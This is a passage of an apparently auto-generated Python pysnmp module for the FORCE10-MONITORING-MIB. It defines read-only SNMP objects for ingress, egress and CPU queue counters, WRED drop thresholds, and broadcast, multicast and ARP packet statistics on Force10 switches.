queue size level at which tail drops occurs. ') f10IngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ') f10IngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 13), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 14), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 15), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10IngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 2, 1, 16), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10IngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10IngQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3), ) if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setStatus('current') if mibBuilder.loadTexts: f10IngQueueMulticastStatTable.setDescription('The Ingress Queue Multicast Statistics Table. This table provides Queue statistics for Ingress Multicast packets at Force10 linecards. ') f10IngQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10IngMulticastQueueId")) if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10IngQueueMulticastStatEntry.setDescription('An entry in the Ingress Queue Multicast Statistics table. The Ingress Queue Multicast Statistics Table is indexed by the source linecard/portpipe and Queue ID. ') f10IngMulticastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 1), F10SlotID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry. ') f10IngMulticastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 2), F10PortPipeID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard. This is the 2nd index of this table entry. ') f10IngMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 3), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastQueueId.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 3rd index of this table entry. ') f10IngMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 4), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10IngMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastBytes.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10IngMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10IngMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ') f10IngMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10IngMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 12), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10IngMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10IngMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 3, 1, 14), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10IngMulticastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10IngMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10EgQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4), ) if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10EgQueueUnicastStatTable.setDescription('The Egress Queue Unicast Statistics Table. This table provides Queue statistics for Egress Unicast packets at Force10 Interface. ') f10EgQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgUnicastQueueId")) if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10EgQueueUnicastStatEntry.setDescription('An entry in the Egress Queue Unicast Statistics table. The Egress Queue Unicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. ') f10EgUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ') f10EgUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 2), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10EgUnicastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastBytes.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10EgUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue. ') f10EgUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10EgUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 4, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10EgUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10EgQueueMulticastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5), ) if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setStatus('current') if mibBuilder.loadTexts: f10EgQueueMulticastStatTable.setDescription('The Egress Queue Multicast Statistics Table. This table provides Queue statistics for Egress Multicast packets at Force10 Interface. ') f10EgQueueMulticastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "FORCE10-MONITORING-MIB", "f10EgMulticastQueueId")) if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10EgQueueMulticastStatEntry.setDescription('An entry in the Egress Queue Multicast Statistics table. The Egress Queue Multicast Statistics Table is indexed by the ifIndex and Queue ID. The IfIndex should be an valid Interface Index as defined in the RFC1213 MIB II Interface Table. ') f10EgMulticastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 1), F10QueueID()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastQueueId.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastQueueId.setDescription('This is the Queue ID of this entry. This is the 2nd index of this table entry. ') f10EgMulticastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 2), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastCycloneVersion.setDescription('The linecard Cyclone hardware version. ') f10EgMulticastBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastBytes.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastBytes.setDescription('The number of bytes in the queue. This object is available on Cyclone version 1.5 (CjTj) hardware only. ') f10EgMulticastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgMulticastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 2.0 (C2T2) and Cyclone version 3.0 (X3) hardwares only. ') f10EgMulticastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgMulticastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 8), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastGreenDrop.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability. ') f10EgMulticastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 10), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs. ') f10EgMulticastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 11), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue. ') f10EgMulticastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 5, 1, 12), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10EgMulticastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10EgMulticastRedDrop.setDescription('The number of Red packets being dropped in this queue. ') f10CpuIngQueueUnicastStatTable = MibTable((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6), ) if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setStatus('current') if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatTable.setDescription('The CPU Ingress Queue Unicast Statistics Table. This table provides Queue statistics for Ingress Unicast packets destined for CPU.') f10CpuIngQueueUnicastStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1), ).setIndexNames((0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcCard"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastSrcPortPipe"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastDestCpu"), (0, "FORCE10-MONITORING-MIB", "f10CpuIngUnicastQueueId")) if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setStatus('current') if mibBuilder.loadTexts: f10CpuIngQueueUnicastStatEntry.setDescription('An entry in the CPU Ingress Queue Unicast Statistics Table. The CPU Ingress Queue Unicast Statistics Table is indexed by the source linecard/portpipe, cpu port and Queue ID.') f10CpuIngUnicastSrcCard = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 1), F10SlotID()) if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastSrcCard.setDescription('This is the source linecard number. This is the first index of this table entry.') f10CpuIngUnicastSrcPortPipe = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 2), F10PortPipeID()) if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastSrcPortPipe.setDescription('This is the Force10 Cyclone PortPipe number of the source linecard.This is the 2nd index of this table entry.') f10CpuIngUnicastDestCpu = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 3), F10ProcessorModuleType()) if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastDestCpu.setDescription('This is the destination CPU port of this entry. This is the 3rd index of this table entry.') f10CpuIngUnicastQueueId = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 4), F10QueueID()) if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastQueueId.setDescription('This is the Queue ID of this entry. This is the 4th index of this table entry.') f10CpuIngUnicastCycloneVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 5), F10CycloneVersion()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastCycloneVersion.setDescription('The linecard Cyclone hardware version.') f10CpuIngUnicastBytesCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 6), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastBytesCount.setDescription('The cumulative number of bytes data passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.') f10CpuIngUnicastPacketCount = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 7), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastPacketCount.setDescription('The cumulative number of packets passing through this queue. This object is available on Cyclone version 3.0 (X3) hardware only.') f10CpuIngUnicastGreenMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenMin.setDescription('The min threshold for Green packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.') f10CpuIngUnicastGreenMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 9), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenMax.setDescription('The max threshold for Green packets. The max threshold identifies the queue size level at which tail drops occurs.') f10CpuIngUnicastGreenDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 10), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastGreenDrop.setDescription('The number of Green packets being dropped in this queue.') f10CpuIngUnicastYellowMin = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 11), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowMin.setDescription('The min threshold for Yellow packets. The min threshold identifies the queue size percentage at which the WRED dropping starts to be applied with a given configured probability.') f10CpuIngUnicastYellowMax = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 12), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowMax.setDescription('The max threshold for Yellow packets. The max threshold identifies the queue size level at which tail drops occurs.') f10CpuIngUnicastYellowDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 13), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastYellowDrop.setDescription('The number of Yellow packets being dropped in this queue.') f10CpuIngUnicastRedDrop = MibTableColumn((1, 3, 6, 1, 4, 1, 6027, 3, 3, 4, 6, 1, 14), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setStatus('current') if mibBuilder.loadTexts: f10CpuIngUnicastRedDrop.setDescription('The number of Red packets being dropped in this queue.') f10BcastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 1), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10BcastPktRecv.setStatus('current') if mibBuilder.loadTexts: f10BcastPktRecv.setDescription('The total broadcast packet received. ') f10BcastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10BcastPktSent.setStatus('current') if mibBuilder.loadTexts: f10BcastPktSent.setDescription('The total broadcast packet sent. ') f10McastPktRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10McastPktRecv.setStatus('current') if mibBuilder.loadTexts: f10McastPktRecv.setDescription('The total multicast packet received. ') f10McastPktSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 1, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10McastPktSent.setStatus('current') if mibBuilder.loadTexts: f10McastPktSent.setDescription('The total multicast packet sent. ') f10ArpReqRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 1), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReqRecv.setStatus('current') if mibBuilder.loadTexts: f10ArpReqRecv.setDescription('The total ARP request received. ') f10ArpReqSent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 2), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReqSent.setStatus('current') if mibBuilder.loadTexts: f10ArpReqSent.setDescription('The total ARP request sent. ') f10ArpReplyRecv = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 3), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReplyRecv.setStatus('current') if mibBuilder.loadTexts: f10ArpReplyRecv.setDescription('The total ARP reply received. ') f10ArpReplySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 4), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpReplySent.setStatus('current') if mibBuilder.loadTexts: f10ArpReplySent.setDescription('The total ARP reply sent. ') f10ArpProxySent = MibScalar((1, 3, 6, 1, 4, 1, 6027, 3, 3, 5, 2, 5), Counter64()).setMaxAccess("readonly") if mibBuilder.loadTexts: f10ArpProxySent.setStatus('current') if mibBuilder.loadTexts: f10ArpProxySent.setDescription('The total ARP proxy sent. ') mibBuilder.exportSymbols("FORCE10-MONITORING-MIB", f10CpuIngUnicastYellowMin=f10CpuIngUnicastYellowMin, f10EgMulticastBytesCount=f10EgMulticastBytesCount, f10OutQueueStatisticsTable=f10OutQueueStatisticsTable, f10MacAccBytes=f10MacAccBytes, f10InQueueCycloneVersion=f10InQueueCycloneVersion, f10IngUnicastQueueId=f10IngUnicastQueueId, f10MacAccPackets=f10MacAccPackets, f10CpuIngUnicastSrcCard=f10CpuIngUnicastSrcCard, f10WredYellowThresholdLow=f10WredYellowThresholdLow, f10WredStatisticsEntry=f10WredStatisticsEntry, f10CpuIngUnicastPacketCount=f10CpuIngUnicastPacketCount, f10WredRedName=f10WredRedName, f10IngMulticastCycloneVersion=f10IngMulticastCycloneVersion, f10EgMulticastRedDrop=f10EgMulticastRedDrop, f10EgQueueMulticastStatEntry=f10EgQueueMulticastStatEntry, f10WredGreenThresholdLow=f10WredGreenThresholdLow, f10EgMulticastCycloneVersion=f10EgMulticastCycloneVersion, f10InQueueMatchBytes=f10InQueueMatchBytes, f10EgMulticastYellowMax=f10EgMulticastYellowMax, f10MonQueueGroup=f10MonQueueGroup, f10OutQueueBytes=f10OutQueueBytes, f10EgUnicastBytes=f10EgUnicastBytes, f10IngUnicastSrcCard=f10IngUnicastSrcCard, f10ArpStatistic=f10ArpStatistic, f10InQueueBytesCount=f10InQueueBytesCount, f10EgUnicastCycloneVersion=f10EgUnicastCycloneVersion, f10EgMulticastPacketCount=f10EgMulticastPacketCount, f10OutQueueStatisticsEntry=f10OutQueueStatisticsEntry, f10CpuIngUnicastGreenDrop=f10CpuIngUnicastGreenDrop, f10IngMulticastYellowMax=f10IngMulticastYellowMax, f10IngQueueMulticastStatTable=f10IngQueueMulticastStatTable, f10BcastPktRecv=f10BcastPktRecv, f10CpuIngQueueUnicastStatEntry=f10CpuIngQueueUnicastStatEntry, f10EgUnicastGreenMax=f10EgUnicastGreenMax, f10IngMulticastYellowMin=f10IngMulticastYellowMin, f10InQueueMatchBps=f10InQueueMatchBps, f10InQueueStatisticsEntry=f10InQueueStatisticsEntry, f10CpuIngUnicastGreenMax=f10CpuIngUnicastGreenMax, 